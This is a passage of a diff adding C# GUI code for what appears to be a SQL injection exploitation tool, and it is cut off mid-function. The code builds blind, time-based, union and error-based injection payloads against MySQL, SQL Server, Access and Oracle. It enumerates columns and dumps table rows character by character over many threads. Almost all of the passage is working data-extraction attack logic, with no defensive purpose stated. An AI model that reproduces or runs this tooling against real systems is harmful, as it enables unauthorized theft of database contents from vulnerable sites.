+ data_list.Add(MySQL5.columns_count.Replace("'{dbname}'", Tools.strToHex(dbName, "UTF-8")).Replace("'{table}'", Tools.strToHex(tableName, "UTF-8")));
+ columns_count_payload = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1);
+ result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", columns_count_payload));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + tableName + "有" + Tools.convertToInt(result) + "个列!");
+ columns_count = Tools.convertToInt(result);
+ for (int i = 0; i < columns_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = ctn;
+ sn.limit = i;
+ sn.tableName = tableName;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getColumnNameByErrorByMySQL), sn);
+ }
+ break;
+ case DBType.SQLServer:
+ result = getOneDataByUnionOrError(MSSQL.error_value.Replace("{data}", MSSQL.columns_count.Replace("{dbname}", dbName).Replace("{table}", tableName)));
+ //HTML解码
+ result = HttpUtility.HtmlDecode(result);
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + tableName + "有" + Tools.convertToInt(result) + "个列!");
+ columns_count = Tools.convertToInt(result);
+ for (int i = 0; i < columns_count; i++)
+ {
+ SelectNode sn = new 
SelectNode();
+ sn.tn = ctn;
+ sn.limit = i;
+ sn.tableName = tableName;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getColumnNameByErrorBySQLServer), sn);
+ }
+ break;
+ case DBType.Oracle:
+ result = getOneHexDataByUnionOrError(Oracle.getErrorDataValue(Oracle.columns_count, dbName, tableName, ""));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + tableName + "有" + Tools.convertToInt(result) + "个列!");
+ columns_count = Tools.convertToInt(result);
+ for (int i = 1; i <= columns_count; i++)
+ {
+ SelectNode sn = new SelectNode();
+ sn.tn = ctn;
+ sn.limit = i;
+ sn.tableName = tableName;
+ sn.dbname = dbName;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getColumnNameByErrorByOracle), sn);
+ }
+ break;
+ }
+
+ }
+ }
+ }
+
+ }
+ private void getColumns()
+ {
+ if (checkConfig())
+ {
+ if (isSetInjectPoint())
+ {
+ switch (config.injectType)
+ {
+ case InjectType.Bool:
+ getColumnsByBool(config.dbType);
+ break;
+ case InjectType.Union:
+ getColumnsByUnion(config.dbType);
+ break;
+ case InjectType.Error:
+ getColumnsByError(config.dbType);
+ break;
+ case InjectType.Sleep:
+ getDBSByBool(config.dbType);
+ break;
+
+ }
+ }
+ else
+ {
+ MessageBox.Show("未标记注入点,请标记!");
+ }
+ }
+ else
+ {
+ MessageBox.Show("注入配置错误,请检查!");
+ }
+ }
+ private void data_dbs_tsl_getColumns_Click(object sender, EventArgs e)
+ {
+
+ if (MyThreadPool.GetAliveThreadsCount() == 0)
+ {
+ status = 1;
+ this.currentThread = new Thread(getColumns);
+ this.currentThread.Start();
+ }
+ else
+ {
+
+ MessageBox.Show("还有线程未结束,请稍候....");
+ }
+
+ }
+
+ ///
+ /// 获取数据
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByBoolByMySQL(Object opam)
+ {
+ try
+ {
+
+ GetDataPam gp = (GetDataPam)opam;
+
+ String data_payload = MySQL5.data_value.Replace("{dbname}", gp.dbname).Replace("{table}", gp.table).Replace("{limit}", gp.limit + "");
+
+ ListViewItem lvi = null;
+
+ foreach (String columnName in gp.columns)
+ {
+ //取每一列的值
+
+ String payload_len = 
MySQL5.ver_length.Replace("{data}", data_payload).Replace("{columns}", columnName);
+
+ if (config.keyType.Equals(KeyType.Time))
+ {
+ payload_len = MySQL5.getBoolCountBySleep(MySQL5.bool_length.Replace("{data}", data_payload).Replace("{columns}", columnName), config.maxTime);
+ }
+ int len = getValueByStepUp(payload_len, 0, 50);
+
+
+ String va_payload = MySQL5.ver_value.Replace("{data}", data_payload).Replace("{columns}", columnName);
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ String tmp_va_payload = MySQL5.mu_value.Replace("{data}", data_payload).Replace("{index}", i + "").Replace("{columns}", columnName);
+ String plen = "";
+ //是否判断多字节字符
+ Boolean pLen_isMax = false;
+ if (config.isMuStr)
+ {
+ //开启多字节判断
+ //转换对应值判断是否多字节字符
+ plen = MySQL5.ver_length.Replace("{data}", tmp_va_payload);
+ if (config.keyType.Equals(KeyType.Time))
+ {
+ plen = MySQL5.getBoolCountBySleep(MySQL5.bool_length.Replace("{data}", tmp_va_payload), config.maxTime);
+ }
+ pLen_isMax = findKeyInBody(plen, 2);
+ }
+
+ //取值payload,替换对应下标值
+
+ //多字节字符
+ if (pLen_isMax)
+ {
+ //MySQL采用hex
+ int mu_payload_len = getValue(plen, 2, 8);
+ int m_index = 1;
+ String[] ver_tmp = new String[mu_payload_len];
+ while (m_index <= mu_payload_len)
+ {
+ //获取多字节
+ int ascii = 0;
+ if (config.keyType.Equals(KeyType.Time))
+ {
+ getValue(MySQL5.getBoolCountBySleep(MySQL5.bool_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), config.maxTime), 0, 128);
+ }
+ else
+ {
+ getValue(MySQL5.ver_value.Replace("{data}", tmp_va_payload).Replace("{index}", m_index + ""), 0, 128);
+ }
+ ver_tmp[m_index - 1] = ((char)ascii).ToString();
+ m_index++;
+ }
+ //设置值,这里由于是hex值,需要转换
+ value += Tools.unHex(Tools.convertToString(ver_tmp), config.db_encoding);
+ }
+ //单字节字符
+ else
+ {
+ String payload = MySQL5.ver_value.Replace("{data}", data_payload).Replace("{columns}", columnName).Replace("{index}", i + "");
+ if (config.keyType.Equals(KeyType.Time))
+ {
+ payload = 
MySQL5.getBoolCountBySleep(MySQL5.bool_value.Replace("{data}", data_payload).Replace("{columns}", columnName).Replace("{index}", i + ""), config.maxTime);
+ }
+
+ int ascii = getValue(payload, 0, 255);
+
+ value += ((char)ascii).ToString();
+ }
+ }
+ if (lvi == null)
+ {
+ lvi = new ListViewItem(value);
+ }
+ else
+ {
+ lvi.SubItems.Add(value);
+ }
+
+ }
+ this.Invoke(new addItemToListViewDelegate(addItemToListView), lvi);
+ this.Invoke(new StringDelegate(log), "获取到第" + (gp.limit + 1) + "行的值!");
+
+ }
+ catch (Exception e)
+ {
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+
+ ///
+ /// 获取数据
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByBoolBySQLServer(Object opam)
+ {
+ try
+ {
+
+ GetDataPam gp = (GetDataPam)opam;
+
+ ListViewItem lvi = null;
+
+ foreach (String columnName in gp.columns)
+ {
+ //取每一列的值
+ String data_payload = MSSQL.getBoolDataPayLoad(columnName, gp.columns, gp.dbname, gp.table, gp.limit);
+ String payload_len = MSSQL.bool_length.Replace("{data}", data_payload).Replace("{columns}", columnName);
+
+ int len = getValueByStepUp(payload_len, 0, 50);
+
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ //取值payload,替换对应下标值
+ //select UNICODE(substring(@@version,{index},1))
+ //取值payload,替换对应下标值
+ String unicode_data_payload = MSSQL.unicode_value.Replace("{index}", i + "").Replace("{data}", data_payload);
+ //取unicode转换后的长度
+ String unicode_data_len_payload = MSSQL.bool_length.Replace("{data}", unicode_data_payload);
+
+ //长度范围2-8支持大部分语言
+ int unicode_data_len = getValue(unicode_data_len_payload, 1, 8);
+ int m_index = 1;
+ StringBuilder unicodes = new StringBuilder();
+ while (m_index <= unicode_data_len)
+ {
+ //获取多字节
+ String substr_payload = MSSQL.substr.Replace("{data}", unicode_data_payload).Replace("{index}", m_index.ToString());
+ //单个unicode值范围是0-9
+ int unicode = getValue(MSSQL.bool_value.Replace("{data}", substr_payload), 0, 9);
+ unicodes.Append(unicode.ToString());
+ m_index++;
+ }
+
+
if (Tools.convertToInt(unicodes.ToString()) > 255)
+ {
+ value += Tools.unHexByUnicode(int.Parse(unicodes.ToString()), config.db_encoding);
+ }
+ else
+ {
+ value += (char)Tools.convertToInt(unicodes.ToString());
+ }
+ }
+ if (lvi == null)
+ {
+ lvi = new ListViewItem(value);
+ }
+ else
+ {
+ lvi.SubItems.Add(value);
+ }
+
+ }
+ this.Invoke(new addItemToListViewDelegate(addItemToListView), lvi);
+ this.Invoke(new StringDelegate(log), "获取到第" + gp.limit + "行的值!");
+
+ }
+ catch (Exception e)
+ {
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+
+
+ ///
+ /// 获取数据
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByBoolByAccess(Object opam)
+ {
+ try
+ {
+
+ GetDataPam gp = (GetDataPam)opam;
+
+ ListViewItem lvi = null;
+
+ foreach (String columnName in gp.columns)
+ {
+ //取每一列的值
+ String data_payload = Access.getBoolDataPayLoad(columnName, gp.columns, gp.dbname, gp.table, gp.limit);
+ String payload_len = Access.bool_length.Replace("{data}", data_payload).Replace("{columns}", columnName);
+
+ int len = getValueByStepUp(payload_len, 0, 50);
+
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ //asc有可能为负数,需要用65536减去这个数
+ String unicode_data_payload = Access.unicode_value.Replace("{index}", i + "").Replace("{data}", data_payload);
+ //取unicode转换后的长度
+ String unicode_data_len_payload = Access.bool_length.Replace("{data}", unicode_data_payload);
+
+ //长度范围2-8支持大部分语言
+ int unicode_data_len = getValue(unicode_data_len_payload, 1, 8);
+ int m_index = 1;
+ StringBuilder unicodes = new StringBuilder();
+ while (m_index <= unicode_data_len)
+ {
+ //获取多字节
+ String substr_payload = Access.substr.Replace("{data}", unicode_data_payload).Replace("{index}", m_index.ToString());
+ //单个unicode值范围是0-9
+ int unicode = getValue(Access.bool_value.Replace("{data}", substr_payload), 0, 9);
+ unicodes.Append(unicode.ToString());
+ m_index++;
+ }
+ if (unicodes.ToString().StartsWith("0") && unicodes.Length > 1)
+ {
+ unicodes.Remove(0, 1);
+
unicodes.Insert(0, "-");
+ }
+
+
+ int strnum = Tools.convertToInt(unicodes.ToString());
+ if (strnum < 0)
+ {
+ strnum = 65536 + strnum;
+
+ }
+ value += Tools.unHexByUnicode(strnum, config.db_encoding);
+ }
+ if (lvi == null)
+ {
+ lvi = new ListViewItem(value);
+ }
+ else
+ {
+ lvi.SubItems.Add(value);
+ }
+
+ }
+ this.Invoke(new addItemToListViewDelegate(addItemToListView), lvi);
+ this.Invoke(new StringDelegate(log), "获取到第" + gp.limit + "行的值!");
+
+ }
+ catch (Exception e)
+ {
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// 获取数据
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByBoolByOracle(Object opam)
+ {
+ try
+ {
+
+ GetDataPam gp = (GetDataPam)opam;
+
+ ListViewItem lvi = null;
+
+ foreach (String columnName in gp.columns)
+ {
+ //取每一列的值
+ String data_payload = Oracle.getBoolDataPayLoad(columnName, gp.columns[0], gp.dbname, gp.table, gp.limit);
+ String payload_len = Oracle.bool_length.Replace("{data}", data_payload).Replace("{column}", columnName);
+
+ int len = getValueByStepUp(payload_len, 0, 50);
+
+ String value = "";
+ //获取值
+ for (int i = 1; i <= len; i++)
+ {
+ //取值payload,替换对应下标值
+ //select UNICODE(substring(@@version,{index},1))
+ //取值payload,替换对应下标值
+ String hex_data_payload = Oracle.hex_value.Replace("{index}", i + "").Replace("{data}", data_payload);
+ //取unicode转换后的长度
+ String hex_data_len_payload = Oracle.bool_length.Replace("{data}", hex_data_payload);
+
+ //长度范围2-8支持大部分语言
+ int unicode_data_len = getValue(hex_data_len_payload, 1, 8);
+ int m_index = 1;
+ StringBuilder hexs = new StringBuilder();
+ while (m_index <= unicode_data_len)
+ {
+ //获取多字节
+ String substr_payload = Oracle.bool_value.Replace("{data}", hex_data_payload).Replace("{index}", m_index.ToString());
+ //单个unicode值范围是0-9
+ int ascii = getValue(substr_payload, 0, 255);
+ hexs.Append((char)ascii);
+ m_index++;
+ }
+ value += Tools.hexToRaw(hexs.ToString(), config.db_encoding);
+
+ }
+ if (lvi == null)
+ {
+ lvi = new 
ListViewItem(value);
+ }
+ else
+ {
+ lvi.SubItems.Add(value);
+ }
+
+ }
+ this.Invoke(new addItemToListViewDelegate(addItemToListView), lvi);
+ this.Invoke(new StringDelegate(log), "获取到第" + gp.limit + "行的值!");
+
+ }
+ catch (Exception e)
+ {
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// 获取数据,union方式
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByUnionByMySQL(Object opam)
+ {
+ try
+ {
+
+ GetDataPam gp = (GetDataPam)opam;
+ String datas_value_payload = MySQL5.creatMySQLColumnsStrByUnion(config.columnsCount, config.showColumn, "1", gp.columns, gp.table, gp.dbname, gp.limit);
+ String result = getOneDataByUnionOrError(MySQL5.union_value.Replace("{data}", datas_value_payload));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,获取到第" + (gp.limit + 1) + "行数据");
+ String[] datas = Regex.Split(result, "\\$\\$\\$");
+ addItemToListView(datas);
+
+ }
+ catch (Exception e)
+ {
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+
+ ///
+ /// 获取数据,union方式
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByUnionBySQLServer(Object opam)
+ {
+ try
+ {
+ GetDataPam gp = (GetDataPam)opam;
+ ListViewItem lvi = new ListViewItem();
+ String result = getOneDataByUnionOrError(MSSQL.getUnionDataValue(config.columnsCount, config.showColumn, 1, gp.dbname, gp.table, gp.columns, gp.limit));
+ this.Invoke(new addItemToListViewByColumnsDelegate(addItemToListViewByColumns), result);
+ this.Invoke(new StringDelegate(log), "获取到第" + gp.limit + "行的值!");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// 获取数据,union方式
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByUnionByAccess(Object opam)
+ {
+ try
+ {
+ GetDataPam gp = (GetDataPam)opam;
+ ListViewItem lvi = new ListViewItem();
+ String result = getOneDataByUnionOrError(Access.getUnionDataValue(config.columnsCount, config.showColumn, gp.columns, gp.table, gp.limit.ToString()).Replace("{table}", 
this.curren_table));
+ this.Invoke(new addItemToListViewByColumnsDelegate(addItemToListViewByColumns), result);
+ this.Invoke(new StringDelegate(log), "获取到第" + gp.limit + "行的值!");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+ ///
+ /// 获取数据,union方式
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByUnionByOracle(Object opam)
+ {
+ try
+ {
+ GetDataPam gp = (GetDataPam)opam;
+ ListViewItem lvi = new ListViewItem();
+ String result = getOneDataByUnionOrError(Oracle.getUnionDataValue(config.columnsCount, config.showColumn, gp.columns, gp.dbname, gp.table, gp.limit.ToString()));
+ this.Invoke(new addItemToListViewByColumnsDelegate(addItemToListViewByColumns), result);
+ this.Invoke(new StringDelegate(log), "获取到第" + gp.limit + "行的值!");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ }
+
+ public void addItemToListView(String[] columnsValue)
+ {
+
+ ListViewItem lvi = null;
+ foreach (String d in columnsValue)
+ {
+ if (lvi == null)
+ {
+ lvi = new ListViewItem(d);
+ }
+ else
+ {
+ lvi.SubItems.Add(d);
+ }
+ }
+ if (lvi != null)
+ {
+ this.Invoke(new addItemToListViewDelegate(addItemToListView), lvi);
+ }
+ }
+
+ ///
+ /// 获取数据MySQL,error方式,这个长度有限,需要判断是否大于错误消息的长度限制是64个
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByErrorByMySQL(Object opam)
+ {
+ try
+ {
+ GetDataPam gp = (GetDataPam)opam;
+
+ ListViewItem lvi = null;
+ foreach (String column in gp.columns)
+ {
+ //获取数据长度
+
+ String datas_payload_columns = MySQL5.creatMySQLColumnStr(column);
+ String datas_payload_length = MySQL5.char_length.Replace("{data}", "(select " + datas_payload_columns + " from " + gp.dbname + "." 
+ gp.table + " limit " + gp.limit + ",1)");
+
+ String d_l_e = MySQL5.creatMySQLColumnStr("(" + datas_payload_length + ")");
+ String datas_payload_length_error = MySQL5.error_value.Replace("{data}", d_l_e);
+
+ String result_length = getOneDataByUnionOrError(datas_payload_length_error);
+
+ int sumlen = Tools.convertToInt(result_length);
+ String datas_value_payload = "(select " + MySQL5.creatMySQLColumnsStrByError(column, gp.table, gp.dbname, gp.limit) + ")";
+ String result = "";
+ int start = 1;
+ //每次获取长度,err方式有长度限制
+ int count = 64 - 6;
+ this.Invoke(new StringDelegate(log), "报告大侠,正在获取数据,每次请求将获取" + count + "字符!");
+ while (start < sumlen)
+ {
+ //hex编码,防止中文等乱码
+ String datas_value_column = MySQL5.substr_value.Replace("{data}", datas_value_payload).Replace("{start}", start.ToString()).Replace("{len}", count.ToString());
+ String c_datas_value_payload = MySQL5.error_value.Replace("{data}", datas_value_column);
+ result += getOneDataByUnionOrError(c_datas_value_payload);
+ start += count;
+ }
+ if (lvi == null)
+ {
+ lvi = new ListViewItem(result);
+ }
+ else
+ {
+ lvi.SubItems.Add(result);
+ }
+
+ }
+ this.Invoke(new addItemToListViewDelegate(addItemToListView), lvi);
+ this.Invoke(new StringDelegate(log), "获取到第" + (gp.limit + 1) + "行的值!");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+
+ }
+
+ ///
+ /// 获取数据SQLServer,error方式,这个长度有限,需要判断是否大于错误消息的长度限制是64个
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByErrorBySQLServer(Object opam)
+ {
+ try
+ {
+ GetDataPam gp = (GetDataPam)opam;
+ ListViewItem lvi = new ListViewItem();
+ String result = getOneDataByUnionOrError(MSSQL.getErrorDataValue(gp.dbname, gp.table, gp.limit, gp.columns));
+ this.Invoke(new addItemToListViewByColumnsDelegate(addItemToListViewByColumns), result);
+ this.Invoke(new StringDelegate(log), "获取到第" + gp.limit + "行的值!");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+
+ }
+
+ ///
+ /// 获取数据oracle,error方式,这个长度有限,需要判断是否大于错误消息的长度限制是256个
+ ///
+ /// 列名集合List及limit等参数
+ public void getDataValueByErrorByOracle(Object opam)
+ {
+ try
+ {
+ GetDataPam gp = (GetDataPam)opam;
+ ListViewItem lvi = new ListViewItem();
+ String datas_len_payload = Oracle.getErrorDataLen(gp.columns, gp.dbname, gp.table, gp.limit.ToString());
+ String result_length = getOneHexDataByUnionOrError(Oracle.error_value.Replace("{data}", datas_len_payload));
+
+ int sumlen = Tools.convertToInt(result_length);
+ String result = "";
+ int start = 1;
+ //每次获取长度,err方式有长度限制
+ int count = 205;
+ if (count < 1)
+ {
+
+ this.Invoke(new StringDelegate(log), "报告大侠,选择的列太多了,无法获取数据!");
+ return;
+ }
+ this.Invoke(new StringDelegate(log), "报告大侠,正在获取数据,每次请求将获取" + count + "个hex字符!");
+ while (start < sumlen)
+ {
+ //hex编码,防止中文等乱码
+ String tmp_data_payload = Oracle.getDataValue(gp.columns, gp.dbname, gp.table, gp.limit.ToString());
+ String err_tmp_data_payload = Oracle.substr_error_value.Replace("{data}", tmp_data_payload).Replace("{start}", start.ToString()).Replace("{len}", count.ToString());
+ result += getOneHexNoUnHexDataByUnionOrError(err_tmp_data_payload);
+ start += count;
+ }
+
+ result = Tools.unHex(result, config.db_encoding);
+
+ this.Invoke(new addItemToListViewByColumnsDelegate(addItemToListViewByColumns), result);
+ this.Invoke(new StringDelegate(log), "获取到第" + gp.limit + "行的值!");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }
+ /*
+ try
+ {
+ GetDataPam gp = (GetDataPam)opam;
+
+ ListViewItem lvi = null;
+ foreach (String column in gp.columns)
+ {
+ //获取数据长度
+
+ String datas_payload_columns = Tools.creatMySQLColumnStr(column);
+ String datas_payload_length = MySQL5.char_length.Replace("{data}", "hex(" + datas_payload_columns) + ") from " + gp.dbname + "." 
+ gp.table + " limit " + gp.limit + ",1";
+
+ String d_l_e = Tools.creatMySQLColumnStr("(" + datas_payload_length + ")");
+ String datas_payload_length_error = MySQL5.error_value.Replace("{data}", d_l_e);
+
+ String result_length = getOneDataByUnionOrError(datas_payload_length_error);
+
+ int sumlen = Tools.convertToInt(result_length);
+ String datas_value_payload = "(select " + Tools.creatMySQLColumnsStrByError(column, gp.table, gp.dbname, gp.limit) + ")";
+ String result = "";
+ int start = 1;
+ //每次获取长度,err方式有长度限制
+ int count = 64 - 6;
+ this.Invoke(new StringDelegate(log), "报告大侠,正在获取数据,每次请求将获取" + count + "字符!");
+ while (start < sumlen)
+ {
+ //hex编码,防止中文等乱码
+ String datas_value_column = Tools.creatMySQLColumnStr(MySQL5.substr_value.Replace("{data}", MySQL5.hex_value.Replace("{data}", datas_value_payload)).Replace("{start}", start.ToString()).Replace("{len}", count.ToString()));
+ String c_datas_value_payload = MySQL5.error_value.Replace("{data}", datas_value_column);
+ result += getOneDataByUnionOrError(c_datas_value_payload);
+ start += count;
+ }
+ //查找格式^^^col$$$col^^^
+ result = Tools.unHex(result, config.db_encoding);
+ Match m = Regex.Match(result, "(?<=(\\^\\^\\!))[.\\s\\S]*?(?=(\\!\\^\\^))");
+ if (m.Success)
+ {
+ result = m.Value;
+ }
+
+ if (lvi == null)
+ {
+ lvi = new ListViewItem(result);
+ }
+ else
+ {
+ lvi.SubItems.Add(result);
+ }
+
+ }
+ this.Invoke(new addItemToListViewDelegate(addItemToListView), lvi);
+ this.Invoke(new StringDelegate(log), "获取到第" + gp.limit + "行的值!");
+ }
+ catch (Exception e)
+ {
+
+ this.Invoke(new StringDelegate(log), "获取值发生异常:" + e.Message);
+ }*/
+
+ }
+
+
+
+ public void getDatasByBool(DBType dbtype, List columns, int start, int dataCount)
+ {
+ bool isMax = false;
+ switch (dbtype)
+ {
+
+ case DBType.Access:
+ isMax = findKeyInBody(Access.bool_datas_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table), dataCount);
+ if (isMax)
+ {
+ //下标从1开始
+ for (int i = 1; i <= dataCount; i++)
+ {
+
GetDataPam gd = new GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByBoolByAccess), gd);
+ }
+ }
+ else
+ {
+
+ MessageBox.Show("没有这么多行数据,改小点,2B!");
+ }
+ break;
+ case DBType.MySQL4:
+
+ break;
+ case DBType.MySQL5:
+
+ if (config.keyType.Equals(KeyType.Time))
+ {
+ isMax = findKeyInBody(MySQL5.getBoolCountBySleep(MySQL5.data_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table), config.maxTime), (start + dataCount));
+ }
+ else
+ {
+ isMax = findKeyInBody(MySQL5.bool_datas_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table), (start + dataCount));
+ }
+
+ if (isMax)
+ {
+ for (int i = 0; i < dataCount; i++)
+ {
+ GetDataPam gd = new GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByBoolByMySQL), gd);
+ }
+ }
+ else
+ {
+
+ MessageBox.Show("没有这么多行数据,改小点,2B!");
+ }
+
+ break;
+ case DBType.SQLServer:
+ isMax = findKeyInBody(MSSQL.bool_datas_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table), dataCount);
+ if (isMax)
+ {
+ //下标从1开始
+ for (int i = 1; i <= dataCount; i++)
+ {
+ GetDataPam gd = new GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByBoolBySQLServer), gd);
+ }
+ }
+ else
+ {
+ MessageBox.Show("没有这么多行数据,改小点,2B!");
+ }
+
+ break;
+ case DBType.Oracle:
+ isMax = findKeyInBody(Oracle.bool_datas_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table), dataCount);
+ if (isMax)
+ {
+ for (int i = 1; i <= dataCount; i++)
+ {
+ GetDataPam gd = new 
GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByBoolByOracle), gd);
+ }
+ }
+ else
+ {
+
+ MessageBox.Show("没有这么多行数据,改小点,2B!");
+ }
+ break;
+ }
+
+ }
+
+
+ public void getDatasByError(DBType dbtype, List columns, int start, int dataCount)
+ {
+ List data_list = new List();
+ String datas_count_payload = "";
+ String result = "";
+ int datas_count = 0;
+ switch (dbtype)
+ {
+
+ case DBType.Access:
+ MessageBox.Show(ErrorMessage.access_no_error_inject_info);
+ break;
+ case DBType.MySQL4:
+ MessageBox.Show(ErrorMessage.mysql4_no_error_inject_info);
+ break;
+ case DBType.MySQL5:
+
+ data_list.Add(MySQL5.data_count.Replace("{dbname}", this.curren_db).Replace("{table}", this.curren_table));
+ datas_count_payload = MySQL5.creatMySQLColumnsStrByError(data_list, null, null, -1);
+ result = getOneDataByUnionOrError(MySQL5.error_value.Replace("{data}", datas_count_payload));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!");
+
+ datas_count = Tools.convertToInt(result);
+ this.dataCount = datas_count;
+ if (datas_count < (dataCount + start))
+ {
+ this.Invoke(new StringDelegate(log), "大侠,表" + this.curren_table + "只有" + Tools.convertToInt(result) + "行数据,你需要获取的数据没有这么多呀!");
+ this.data_dbs_txt_count.Text = this.dataCount.ToString();
+ break;
+ }
+
+ for (int i = 0; i < dataCount; i++)
+ {
+ GetDataPam gd = new GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByErrorByMySQL), gd);
+ }
+ break;
+ case DBType.SQLServer:
+ result = getOneDataByUnionOrError(MSSQL.error_value.Replace("{data}", MSSQL.data_count.Replace("{dbname}", this.curren_db).Replace("{table}", 
this.curren_table)));
+ //HTML解码
+ result = HttpUtility.HtmlDecode(result);
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!");
+
+ datas_count = Tools.convertToInt(result);
+ this.dataCount = datas_count;
+ if (datas_count < (dataCount + start))
+ {
+ this.Invoke(new StringDelegate(log), "大侠,表" + this.curren_table + "只有" + Tools.convertToInt(result) + "行数据,你需要获取的数据没有这么多呀!");
+ this.data_dbs_txt_count.Text = this.dataCount.ToString();
+ break;
+ }
+ //注意下标从1开始
+ for (int i = 1; i <= dataCount; i++)
+ {
+ GetDataPam gd = new GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ //按照一行的一列一列开始获取
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByErrorBySQLServer), gd);
+ }
+ break;
+ case DBType.Oracle:
+ result = getOneHexDataByUnionOrError(Oracle.getErrorDataValue(Oracle.union_data_count, this.curren_db, this.curren_table, ""));
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!");
+
+ datas_count = Tools.convertToInt(result);
+ this.dataCount = datas_count;
+ if (datas_count < (dataCount + start))
+ {
+ this.Invoke(new StringDelegate(log), "大侠,表" + this.curren_table + "只有" + Tools.convertToInt(result) + "行数据,你需要获取的数据没有这么多呀!");
+ this.data_dbs_txt_count.Text = this.dataCount.ToString();
+ break;
+ }
+ //注意下标从1开始
+ for (int i = 1; i <= dataCount; i++)
+ {
+ GetDataPam gd = new GetDataPam();
+ gd.columns = columns;
+ gd.dbname = this.curren_db;
+ gd.table = this.curren_table;
+ gd.limit = start + i;
+ gd.isMuStr = config.isMuStr;
+ //按照一行的一列一列开始获取
+ MyThreadPool.initThread(new ParameterizedThreadStart(getDataValueByErrorByOracle), gd);
+ }
+ break;
+ }
+
+ }
+
+
+ public void getDatasByUnion(DBType dbtype, List columns, int start, int dataCount)
+ {
+ List data_list = new List();
+ String datas_count_payload = "";
+ String
result = "";
+
+ int datas_count = 0;
+ switch (dbtype)
+ {
+
+ case DBType.Access:
+
+ datas_count_payload = Access.getUnionDataValue(config.columnsCount, config.showColumn, 1, Access.data_count.Replace("{table}", this.curren_table)).Replace("{table}", this.curren_table);
+ result = getOneDataByUnionOrError(datas_count_payload);
+
+ this.Invoke(new StringDelegate(log), "报告大侠,表" + this.curren_table + "有" + Tools.convertToInt(result) + "行数据!");
+
+ datas_count = Tools.convertToInt(result);
+ this.dataCount = datas_count;
+ if (datas_count < (dataCount + start))
+ {
